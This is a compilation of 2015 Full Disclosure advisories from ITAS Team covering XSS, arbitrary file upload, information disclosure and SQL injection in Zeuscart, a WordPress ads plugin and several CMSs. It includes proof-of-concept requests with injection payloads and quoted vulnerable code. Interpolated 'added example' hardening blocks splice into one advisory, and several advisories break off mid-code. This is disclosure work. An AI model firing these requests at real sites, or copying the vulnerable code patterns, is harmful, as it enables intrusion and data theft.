[FD] Cross-Site Scripting | Zeuscart V4

2015-11-02 Thread ITAS Team
#Vulnerability: Cross-Site Scripting
#Vendor: http://www.zeuscart.com
#Download link: http://zeuscart.com/download/
#Affected version: Zeuscart V4
#CVSS v3.0 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
#Condition: The attack is performed by an "Anonymous User"
#Payload: "--><ScRipt>alert(/ITASVN/)</ScRipT>
#Fix version: N/A
#Author: Dang Quoc Thai (thai.q.d...@itas.vn) & ITAS Team

::PROOF OF CONCEPT::
+ REQUEST
GET /index.php?do=search&search=%22--%3E%3CScRipt%3Ealert(/ITASVN/)%3C/ScRipT%3E HTTP/1.1
Host: demo.target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.target.com/demo/
Cookie: PHPSESSID=0f9ce01d2822471dee23af07947e9074
Connection: keep-alive

+ RESPONSE
HTTP/1.1 200 OK
Date: Mon, 02 Nov 2015 02:21:55 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25032
...
[response body, tag-stripped in the archive: the search box reflects the submitted value without encoding, the fragment around it reads]
alert(/ITASVN/)"
onclick="searchitem();">
Search
+ REFERENCE:
- http://www.itas.vn/en/itas-team-found-out-a-cross-site-scripting-vulnerability-in-zeuscart-cms/
- https://www.youtube.com/watch?v=CPgzAra_mXw


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Wordpress plugin Simple Ads Manager - Information Disclosure

2015-04-04 Thread ITAS Team
#Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID:  CVE-2015-2826
#Author: Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team


::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

action=load_users



+ Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats, ...
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Image: http://www.itas.vn/uploads/newsother/disclosure.png

+ REFERENCE:
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en


Best regards
----
ITAS Team (www.itas.vn)




[FD] Wordpress plugin Simple Ads Manager - Arbitrary File Upload

2015-04-04 Thread ITAS Team
#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2825
#Author: Tran Dinh Tien (tien.d.t...@itas.vn) & ITAS Team


::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: targer.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---10898951822009521617421026
Content-Length: 683

-----10898951822009521617421026
Content-Disposition: form-data; name="uploadfile"; filename="info.php"
Content-Type: application/x-php


-----10898951822009521617421026
Content-Disposition: form-data; name="action"

upload_ad_image
-----10898951822009521617421026--


+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 303 to 314

case 'sam_ajax_upload_ad_image':
  if (isset($_POST['path'])) {
    // both the target directory and the file name come straight from the client
    $uploadDir = $_POST['path'];
    $file = $uploadDir . basename($_FILES['uploadfile']['name']);

    // no capability check, no nonce, no type or extension check before the move
    if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)) {
      $out = array('status' => "success");
    } else {
      $out = array('status' => "error");
    }
  }
  break;
  
  
+ REFERENCE:
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
- https://www.youtube.com/watch?v=8IU9EtUTkxI


Best regards

ITAS Team (www.itas.vn)
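As an added example (not the plugin's code), this is the hardened shape of the upload handler quoted above; it also applies the capability and nonce gate that the information-disclosure post above shows the admin-ajax actions lack. It assumes a WordPress context that provides current_user_can, check_ajax_referer and wp_send_json; the nonce action 'sam_ad_image' and all function names are hypothetical.

```php
<?php
// Added example, not Simple Ads Manager code. Hardened replacement for the
// 'sam_ajax_upload_ad_image' case quoted above. Assumes a WordPress admin-ajax
// context (current_user_can, check_ajax_referer, wp_send_json); the nonce action
// 'sam_ad_image' and every function name here are hypothetical.

// Allowed image types, keyed by the MIME type detected from file content.
const AD_IMAGE_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

/**
 * Decide the file type from its bytes, never from the client-supplied
 * filename or the Content-Type of the multipart part. Returns the extension
 * to store under, or null when the upload is not an allowed image.
 */
function ad_image_extension(string $tmpPath): ?string
{
    if (!is_file($tmpPath)) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!isset(AD_IMAGE_TYPES[$mime])) {
        return null;
    }
    // Second opinion from the image decoder: a script with a forged magic
    // header is caught here even if finfo was fooled.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    return AD_IMAGE_TYPES[$mime];
}

/**
 * Destination path: the directory is fixed by the server ($_POST['path'] is
 * ignored) and the basename is random, so the client controls neither where
 * the file lands nor what extension it gets.
 */
function ad_image_destination(string $uploadDir, string $ext): string
{
    return rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
}

/** The admin-ajax handler. $uploadDir is a server-side setting. */
function sam_upload_ad_image(string $uploadDir): void
{
    // The original endpoint answered anonymous POSTs; gate on capability and
    // a nonce before touching the upload at all.
    if (!current_user_can('upload_files')) {
        wp_send_json(['status' => 'error', 'reason' => 'forbidden'], 403);
    }
    check_ajax_referer('sam_ad_image', 'nonce');

    $file = $_FILES['uploadfile'] ?? null;
    if ($file === null || $file['error'] !== UPLOAD_ERR_OK) {
        wp_send_json(['status' => 'error', 'reason' => 'no file']);
    }
    $ext = ad_image_extension($file['tmp_name']);
    if ($ext === null) {
        wp_send_json(['status' => 'error', 'reason' => 'not an allowed image']);
    }
    $dest = ad_image_destination($uploadDir, $ext);
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        wp_send_json(['status' => 'error', 'reason' => 'move failed']);
    }
    wp_send_json(['status' => 'success', 'file' => basename($dest)]);
}

// Stand-alone check of the content-based type test (no WordPress needed).
if (PHP_SAPI === 'cli') {
    $png = tempnam(sys_get_temp_dir(), 'ad');   // constructed 1x1 PNG
    file_put_contents($png, base64_decode(
        'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
    ));
    $php = tempnam(sys_get_temp_dir(), 'ad');   // constructed body of an "info.php" upload
    file_put_contents($php, "<?php echo 'not an image';\n");

    printf("png -> %s\n", var_export(ad_image_extension($png), true));
    printf("php -> %s\n", var_export(ad_image_extension($php), true));
    unlink($png);
    unlink($php);
}
```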




[FD] Multiple SQL Injection

2015-04-04 Thread ITAS Team
#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h...@itas.vn) & ITAS Team


::PROOF OF CONCEPT::

---SQL INJECTION 1---

+ REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=sam_hits&hits%5B0%5D%5B%5D=&hits%5B1%5D%5B%5D=&hits%5B2%5D%5B%5D=&level=3


- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:

case 'sam_ajax_sam_hits':
  if (isset($_POST['hits']) && is_array($_POST['hits'])) {
    $hits = $_POST['hits'];
    $values = '';
    $remoteAddr = $_SERVER['REMOTE_ADDR'];
    foreach ($hits as $hit) {
      // $hit[1] and $hit[0] are interpolated into the SQL text unquoted and unescaped
      $values .= ((empty($values)) ? '' : ', ')
        . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
    }
    $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};";
    $result = $wpdb->query($sql);
    // both branches echo the full query (and on failure the raw input) back to the client
    if ($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
    else echo json_encode(array(
      'success' => false,
      'result' => $result,
      'sql' => $sql,
      'hits' => $hits,
      'values' => $values
    ));
  }
  break;


  
  
---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr=&sp=Post&spg=Page

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
  $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
  $sPost = (isset($_REQUEST['sp'])) ? urldecode($_REQUEST['sp']) : 'Post';
  $sPage = (isset($_REQUEST['spg'])) ? urldecode($_REQUEST['spg']) : 'Page';

  //set @row_num = 0;
  //SELECT @row_num := @row_num + 1 AS recid
  // $custs is concatenated into the quoted FIND_IN_SET literal without escaping
  $sql = "SELECT
    wp.id,
    wp.post_title AS title,
    wp.post_type AS type
  FROM
    $postTable wp
  WHERE
    wp.post_status = 'publish' AND
    FIND_IN_SET(wp.post_type, 'post,page{$custs}')
  ORDER BY wp.id;";

  $posts = $wpdb->get_results($sql, ARRAY_A);

  $k = 0;
  foreach ($posts as &$val) {
    switch ($val['type']) {
      case 'post':
        $val['type'] = $sPost;
        break;
      case 'page':
        $val['type'] = $sPage;
        break;
      default:
        $val['type'] = $sPost . ': ' . $val['type'];
        break;
    }
    $k++;
    $val['recid'] = $k;
  }
  $out = array(
    'status' => 'success',
    'total' => count($posts),
    'records' => $posts
  );
  break;

  
  
---SQL INJECTION 3---
+REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm= HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.
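An added example (not the plugin's code) of how the 'sam_ajax_sam_hits' handler above can build the same multi-row INSERT without any client character entering the query text; the same pattern, integer validation plus a prepared statement, addresses the other string-built queries in this listing. $wpdb and $sTable are the plugin's globals named in the advisory; build_hits_insert(), sam_hits_handler() and the table name wp_sam_stats are hypothetical, and wp_send_json is assumed from WordPress.

```php
<?php
// Added example, not Simple Ads Manager code. Hardened form of the
// 'sam_ajax_sam_hits' case quoted above. $wpdb and $sTable are the plugin's
// globals; build_hits_insert() and sam_hits_handler() are hypothetical names.

/**
 * Turn the client's hits array into a template for $wpdb->prepare() plus its
 * argument list. Every id/pid is validated as a non-negative integer and bound
 * through %d, the address through %s, so no client byte reaches the SQL text.
 * Returns [$template, $args], or null when any entry is malformed.
 */
function build_hits_insert(string $table, array $hits, string $remoteAddr): ?array
{
    $rows = [];
    $args = [];
    foreach ($hits as $hit) {
        // The original code interpolated $hit[1] and $hit[0] raw. Require an
        // exact pair of digit strings; the PoC's hits[0][]= shape fails here.
        if (!is_array($hit) || count($hit) !== 2
            || !ctype_digit((string) $hit[0]) || !ctype_digit((string) $hit[1])) {
            return null;
        }
        $rows[] = '(%d, %d, NOW(), 0, %s)';
        array_push($args, (int) $hit[1], (int) $hit[0], $remoteAddr);
    }
    if ($rows === []) {
        return null;
    }
    // Table names cannot be bound; $table is a server-side constant, not input.
    $template = "INSERT INTO {$table} (id, pid, event_time, event_type, remote_addr) VALUES "
        . implode(', ', $rows);
    return [$template, $args];
}

/** The ajax handler as it would use the helper. */
function sam_hits_handler(): void
{
    global $wpdb, $sTable;
    if (!isset($_POST['hits']) || !is_array($_POST['hits'])) {
        wp_send_json(['success' => false]);
    }
    $built = build_hits_insert($sTable, $_POST['hits'], $_SERVER['REMOTE_ADDR']);
    if ($built === null) {
        wp_send_json(['success' => false]);
    }
    [$template, $args] = $built;
    $result = $wpdb->query($wpdb->prepare($template, ...$args));
    // Unlike the original, neither branch echoes the query, the input or the
    // driver result back to the caller.
    wp_send_json(['success' => $result > 0]);
}

// Stand-alone exercise of the helper (no WordPress needed): the PoC-shaped
// input is rejected, a well-formed one yields a fully parameterised template.
if (PHP_SAPI === 'cli') {
    $poc = [[''], [''], ['']];   // constructed: hits[0][]=&hits[1][]=&hits[2][]=
    var_dump(build_hits_insert('wp_sam_stats', $poc, '127.0.0.1'));
    [$template, $args] = build_hits_insert('wp_sam_stats', [['3', '7'], ['4', '7']], '127.0.0.1');
    echo $template, PHP_EOL;
    print_r($args);
}
```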


[FD] Community Gallery - Stored Cross-Site Scripting vulnerability

2015-03-12 Thread ITAS Team
#Vulnerability title: Community Gallery - Stored Cross-Site Scripting vulnerability
#Product: Community Gallery
#Vendor: https://www.woltlab.com
#Affected version: Community Gallery 2.0 before 12/10/2014
#Download link: https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
#Fixed version: Community Gallery 2.0 after 12/26/2014
#CVE ID: CVE-2015-2275
#Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)


::PROOF OF CONCEPT::

+ REQUEST:
POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/
Content-Length: 1300
Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription%5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7%5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D=1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisEdit%5D=1


- Vulnerable parameter: parameters[data][7][title]


::DISCLOSURE::
+ 12/10/2014: Detected vulnerability
+ 12/10/2014: Sent vulnerability details to vendor
+ 03/11/2015: Published information

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html


::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE
USER'S OWN RISK.



----
ITAS Team (itas.t...@itas.vn)





[FD] ProjectSend r561 - SQL injection vulnerability

2015-03-05 Thread ITAS Team
#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/download/67/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n...@itas.vn) & ITAS Team (www.itas.vn)


::PROOF OF CONCEPT::

+ REQUEST:
GET /projectsend/users-edit.php?id= HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456; PHPSESSID=jec50hu4plibu5p2p6hnvpcut6
Connection: keep-alive


- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code:
if (isset($_GET['id'])) {
    // only quote characters are escaped; the id is never cast to an integer
    $client_id = mysql_real_escape_string($_GET['id']);
    /**
     * Check if the id corresponds to a real client.
     * Return 1 if true, 2 if false.
     **/
    $page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
    /**
     * Return 0 if the id is not set.
     */
    $page_status = 0;
}

/**
 * Get the clients information from the database to use on the form.
 */
if ($page_status === 1) {
    // $client_id is interpolated unquoted, so the escaping above gives no protection here
    $editing = $database->query("SELECT * FROM tbl_users WHERE id=$client_id");
    while ($data = mysql_fetch_array($editing)) {
        $add_client_data_name = $data['name'];
        $add_client_data_user = $data['user'];
        $add_client_data_email = $data['email'];
        $add_client_data_addr = $data['address'];
        $add_client_data_phone = $data['phone'];
        $add_client_data_intcont = $data['contact'];
        if ($data['notify'] == 1) { $add_client_data_notity = 1; }
        else { $add_client_data_notity = 0; }
        if ($data['active'] == 1) { $add_client_data_active = 1; }
        else { $add_client_data_active = 0; }
    }
}



::DISCLOSURE::
+ 01/06/2015: Detected vulnerability
+ 01/07/2015: Contacted vendor
+ 01/08/2015: Sent vulnerability details to vendor - vendor did not reply
+ 03/05/2015: Published information

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in-projectsend-r561-76.html





Best Regards,
-
ITAS Team (www.itas.vn)





[FD] Redaxscript CMS 2.2.0 - SQL Injection vulnerability

2015-02-11 Thread ITAS Team
#Vulnerability title: Redaxscript CMS 2.2.0 - SQL Injection vulnerability
#Vendor: http://redaxscript.com/
#Product: Redaxscript CMS
#Software link: http://redaxscript.com/download/releases
#Affected version: Redaxscript 2.2.0
#Fixed version: Redaxscript 2.3.0
#CVE ID: CVE-2015-1518
#Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)



:: PROOF OF CONCEPT ::

POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

search_terms=[SQL INJECTION HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_post=Search



- Vulnerable parameter: $search_terms
- Vulnerable file:  redaxscript/includes/search.php
- Vulnerable function:  search_post()

- Vulnerable code:
function search_post()
{
    /* clean post */

    if (ATTACK_BLOCKED < 10)
    {
        $search_terms = clean($_POST['search_terms'], 5);
    }

    /* validate post */

    if (strlen($search_terms) < 3 || $search_terms == l('search_terms'))
    {
        $error = l('input_incorrect');
    }

    /* query results */

    else
    {
        $search = array_filter(explode(' ', $search_terms));
        $search_keys = array_keys($search);
        $last = end($search_keys);

        /* query search */

        $query = 'SELECT id, title, alias, description, date, category, access FROM ' . PREFIX . 'articles WHERE (language = \'' . Redaxscript\Registry::get('language') . '\' || language = \'\') && status = 1';
        if ($search)
        {
            $query .= ' && (';
            foreach ($search as $key => $value)
            {
                /* each search word is concatenated into the LIKE patterns as-is */
                $query .= 'title LIKE \'%' . $value . '%\' || description LIKE \'%' . $value . '%\' || keywords LIKE \'%' . $value . '%\' || text LIKE \'%' . $value . '%\'';
                if ($last != $key)
                {
                    $query .= ' || ';
                }
            }
            $query .= ')';
        }
        $query .= ' ORDER BY date DESC LIMIT 50';
        $result = Redaxscript\Db::forTablePrefix('articles')->rawQuery($query)->findArray();
        $num_rows = count($result);
        if ($result == '' || $num_rows == '')
        {
            $error = l('search_no');
        }

        /* collect output */

        else if ($result)
        {
            $accessValidator = new Redaxscript\Validator\Access();
            $output = '' . l('search') . '';
            $output .= form_element('fieldset', '', 'set_search_result', '', '', '' . l('articles') . '') . '';
            foreach ($result as $r)
            {
                $access = $r['access'];

                /* if access granted */

                if ($accessValidator->validate($access, MY_GROUPS) === Redaxscript\Validator\Validator::PASSED)
                {
                    if ($r)
                    {
                        foreach ($r as $key => $value)
                        {
                            $$key = stripslashes($value);
                        }
                    }

                    /* prepare metadata */

                    if ($description == '')
                    {
                        $description = $title;
                    }
                    $date = date(s('date'), strtotime($date));

                    /* build route */

                    if ($category == 0)

[FD] Sefrengo CMS v1.6.1 - Multiple SQL Injection Vulnerabilities

2015-02-02 Thread ITAS TEAM
# Exploit Title: Sefrengo CMS v1.6.1 - Multiple SQL Injection Vulnerabilities
# Vendor: http://www.sefrengo.org/
# Download link: http://forum.sefrengo.org/index.php?showtopic=3368 (https://github.com/sefrengo-cms/sefrengo-1.x/tree/22c0d16bfd715631ed317cc990785ccede478f07)
# CVE ID: CVE-2015-1428
# Vulnerability: SQL Injection
# Affected version: Sefrengo CMS v1.6.1
# Fixed version: Sefrengo CMS v1.6.2
# Author: Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team (www.itas.vn)


::PROOF OF CONCEPT::

Link 1:

- Vulnerable file:   /backend/external/phplib/ct_sql.inc
- Vulnerable function:   function ac_get_value($id, $name)
- Vulnerable parameter:  $id
- Vulnerable code:
function ac_get_value($id, $name) {
  global $cms_db;
  // $id is placed into the query unescaped; only $name goes through addslashes()
  $this->db->query(sprintf("select val from %s where sid = '%s' and name = '%s'",
    $cms_db['sessions'],
    $id,
    addslashes($name)));
  if ($this->db->next_record()) {
    $str  = $this->db->f("val");
    $str2 = base64_decode($str);

    if (ereg("^".$name.":.*", $str2)) {
      $str = ereg_replace("^".$name.":", "", $str2);
    } else {
      $str3 = stripslashes($str);

      if (ereg("^".$name.":.*", $str3)) {
        $str = ereg_replace("^".$name.":", "", $str3);
      } else {
        switch ($this->encoding_mode) {
          case "slashes":
            $str = stripslashes($str);
            break;

          case "base64":
          default:
            $str = base64_decode($str);
        }
      }
    };
    return $str;
  };
  return "";
}

Link 2:

- Vulnerable file:   /backend/inc/class.values_ct.php
- Vulnerable function:   function set_value($mixed)
- Vulnerable parameter:  $mixed['id']
- Vulnerable code:
function set_value($mixed)
{
  global $cms_db, $db;
  //build query

  $sql_group = (empty($mixed['group'])) ? 0 : ''.$mixed['group'];
  $sql_client = (empty($mixed['client'])) ? '' : 'AND idclient IN ('. $mixed['client'] .')';
  $sql_lang = (empty($mixed['lang'])) ? '' : 'AND idlang IN ('. $mixed['lang'] .')';
  $sql_key = (empty($mixed['key'])) ? '' : 'AND V.key1 = "'. $mixed['key'] . '" ';
  $sql_key2 = (empty($mixed['key2'])) ? '' : 'AND V.key2 = "'. $mixed['key2'] . '" ';
  $sql_key3 = (empty($mixed['key3'])) ? '' : 'AND V.key3 = "'. $mixed['key3'] . '" ';
  $sql_key4 = (empty($mixed['key4'])) ? '' : 'AND V.key4 = "'. $mixed['key4'] . '" ';
  // $mixed['id'] is concatenated straight into the WHERE clause
  $sql_id = (empty($mixed['id'])) ? "" : "AND V.idvalues = '". $mixed['id'] . "' ";

  $sql = "SELECT *
    FROM ". $cms_db['values'] ." AS V
    WHERE V.group_name IN ('$sql_group')
    $sql_client $sql_lang
    $sql_key $sql_key2 $sql_key3 $sql_key4 $sql_id";

  //die($sql);
  $db->query($sql);

  $count_rows = $db->num_rows();

  if ($count_rows > 1) {
    echo $sql .' Fehler in Klasse "cms_value_ct". Es wurde mehr als ein Ergebnis gefunden. Anfrage ist nicht eindeutig';
    exit;
  }
  elseif ($count_rows == 1) {
    $db->next_record();
    $mixed['id'] = $db->f('idvalues');
    //echo "update";
    $this->_update_by_id($mixed);
  }
  else {
    $this->insert($mixed);
  }

}

::DISCLOSURE::
+ 01/08/2015: Send the detail of vulnerabilities to vendor and Vendor
confirmed
+ 01/25/2015: Vendor releases patch
+ 01/26/2015: ITAS Team publishes information

::REFERENCE::
- Detail and videos:
http://www.itas.vn/news/itas-team-found-out-multiple-sql-injection-vulnerabilities-in-sefrengo-cms-v1-6-1-74.html
-
https://github.com/sefrengo-cms/sefrengo-1.x/commit/22c0d16bfd715631ed317cc990785ccede478f07


::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is
hereby granted for the electronic redistribution of this information. It is
not to be edited or altered in any way without the express written consent
of ITAS CORP.


=
ITAS Team (www.itas.vn)



[FD] SQL Injection Vulnerability in Microweber 0.95

2015-01-12 Thread ITAS Team
# Exploit Title: SQL Injection Vulnerability in Microweber 0.95
# Vendor: https://microweber.com/
# Download link: https://microweber.com/download (https://github.com/microweber/microweber)
# CVE ID: CVE-2014-9464
# Vulnerability: SQL Injection
# Affected version: Version 0.95 before 12/09/2014.
# Fixed version: Version 0.95 updated on 12/11/2014
# Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)

::VULNERABILITY DETAIL::

- A SQL injection vulnerability has been found and confirmed within the
Microweber CMS as an anonymous user. A successful attack could allow an
anonymous attacker to access information such as username and password
hashes, or other private information that is stored in the database. The
following URL and parameter have been confirmed to suffer from SQL
injection.

- Attack vector:

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive


- Vulnerable file:   microweber-master/src/Microweber/Category.php
- Vulnerable function:   get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
- Vulnerable parameter:  $parent_id
- Vulnerable code:

